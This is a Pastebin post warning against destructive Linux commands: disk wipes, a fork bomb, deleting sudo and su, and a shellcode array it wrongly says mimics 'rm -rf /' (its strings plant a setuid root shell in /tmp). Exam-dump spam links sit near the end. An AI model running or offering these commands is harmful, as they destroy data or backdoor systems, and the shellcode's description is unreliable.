Advertisement
BaSs_HaXoR

fatal linux commands

Sep 26th, 2015
419
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.46 KB | None | 0 0
  1. In this post I will collect all commands which SHOULD NEVER be executed in Linux. Any of them will cause data loss or corruption, can freeze or hang up running system.
  2.  
  3. NEVER RUN THESE COMMANDS IN LINUX BOX CLI!
  4.  
  5. Even if somebody advises you in forum/im to do it.
  6. ############################################################################
  7. 1. Any of these commands will erase everything from your home directory, root or just will clear up whole disk:
  8.  
  9. sudo rm -rf /
  10. rm -rf .*
  11. dd if=/dev/zero of=/dev/sda
  12. mkfs.ext3 /dev/hda
  13. whatever > /dev/hda
  14. cd ~; for x in `ls`; do mv -f $x $y; y=$x; done
  15. find -type f -mtime +30 -exec mv {} /dev/null \;
  16. mv ~ /dev/null
  17. mv / /dev/null
  18.  
  19. ##################################################################################
  20. 2. Causes kernel panic or freezes Linux box:
  21.  
  22. dd if=/dev/random of=/dev/port
  23. :( ){:|:&};: #also known as fork bomb
  24.  
  25. ##################################################################################
  26. 3. This one does the same as "rm -rf /":
  27.  
  28. char esp[] __attribute__ ((section(".text"))) /* e.s.p
  29. release */
  30. = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
  31. "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
  32. "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
  33. "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
  34. "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
  35. "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
  36. "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
  37. "cp -p /bin/sh /tmp/.beyond; chmod 4755
  38. /tmp/.beyond;";
  39. ##################################################################################
  40. 4. This one will prevent you from executing commands with root rights:
  41.  
  42. rm -f /usr/bin/sudo;rm -f /bin/su
  43.  
  44. If you know any other commands that can damage running Linux system or pose fatal problem to system administrators -- just comment it here so I could update this post. Thanks.
  45.  
  46. Update: See what happens if execute rm -rf / in Ubuntu: http://www.youtube.com/watch?v=wWOjmvWPRvQ
  47.  
  48. Information improvisation: Whether you want to pass http://www.braindumps.com/70-687.htm exams or looking for http://www.pass4-sure.us/300-209-dumps.html our http://www.test-king.com/exams/70-411.htm can provide guaranteed success in real exam of http://www.ibm.com/us/en/ are also having unique sense and more visit http://www.actualtests.com/exam-70-411.htm Good Luck.
  49. ##################################################################################
  50. //Source: http://www.linuxscrew.com/2009/12/03/13-linux-lethal-commands/
  51. //BaSs_HaXoR
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement